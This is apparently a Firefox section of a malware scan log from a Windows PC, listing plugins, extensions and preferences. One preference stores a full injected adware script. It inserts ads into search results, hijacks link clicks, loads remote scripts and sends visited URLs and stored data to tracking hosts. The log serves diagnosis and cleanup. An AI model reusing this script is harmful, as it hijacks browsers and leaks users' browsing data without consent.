FF - prefs.js..browser.search.selectedEngine: "QIP Search"
FF - prefs.js..browser.startup.homepage: "seznam.cz"
FF - prefs.js..extensions.eKAVDKGwssAwgwXy.scode:
(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=15713307296802838624&eid=42&pid=2729&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CZ&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. 
s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs 
a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://w ... m=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\" ... earch.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/searc ... arch.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael 
.cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else 
if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json(c));a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, 
{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var 
b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var 
d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, 
function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=15713307296802838624&eid=42&pid=2729&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var 
a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=42_2729&hid=15713307296802838624&bname=pricechop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=42_2729&hid=15713307296802838624&bname=pricechop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self.location.hostname.indexOf('mail.')==-1)\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ecgc6VPn=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ecgc6VPn=\")){var d=a.match(/ecgc6VPn=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new 
Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BN ... YHpdgGqa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update 
Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=rTw6vTw4qS5G ... }}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children.getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},l=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");if(a&&a[1]&&a[1].innerHTML)return(a=a[1].innerHTML.replace(/[^0-9]/g,\"\"))||0;if(a&&a[0]&&a[0].innerHTML||(a=document.getElementsByClassName(\"_mov\"))&&a[0]&&a[0].innerHTML)return(a=a[0].innerHTML.replace(/[^0-9]/g,\"\"))||0};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{var e=document.getElementsByTagName(\"body\")[0];if(!e.getAttribute(\"wyttb\")){e.setAttribute(\"wyttb\",\"1\");var 
f=g(),d=h(),m=k(),n=l();f&&d&&d&&((new Image).src=\"https://score.transferin.in/v.php?id=\" ... 96.213.165\")}}catch(p){}})();;if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1.45\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG ... DeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B0d45f140-f048-43a8-8755-71bde9e9f4e6%7D:2.0.3.0
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.1
FF - prefs.js..keyword.URL: ""
FF - user.js - File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Lobo\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\PROGRAM FILES\ESET\ESET SMART SECURITY\MOZILLA THUNDERBIRD [2013.04.23 15:43:57 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird [2013.04.23 15:43:57 | 000,000,000 | ---D | M]

[2013.04.19 14:50:49 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Extensions
[2014.12.05 17:54:18 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\extensions
[2012.08.24 12:47:32 | 000,005,054 | ---- | M] () (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\extensions\QipCounter@qip.ru.xpi
[2014.06.29 18:47:18 | 000,201,488 | ---- | M] () (No name found) -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\extensions\{0d45f140-f048-43a8-8755-71bde9e9f4e6}.xpi
[2013.04.19 16:30:02 | 000,002,062 | ---- | M] () -- C:\Users\Lobo\AppData\Roaming\Mozilla\Firefox\Profiles\fa980s6u.default\searchplugins\qip-search.xml
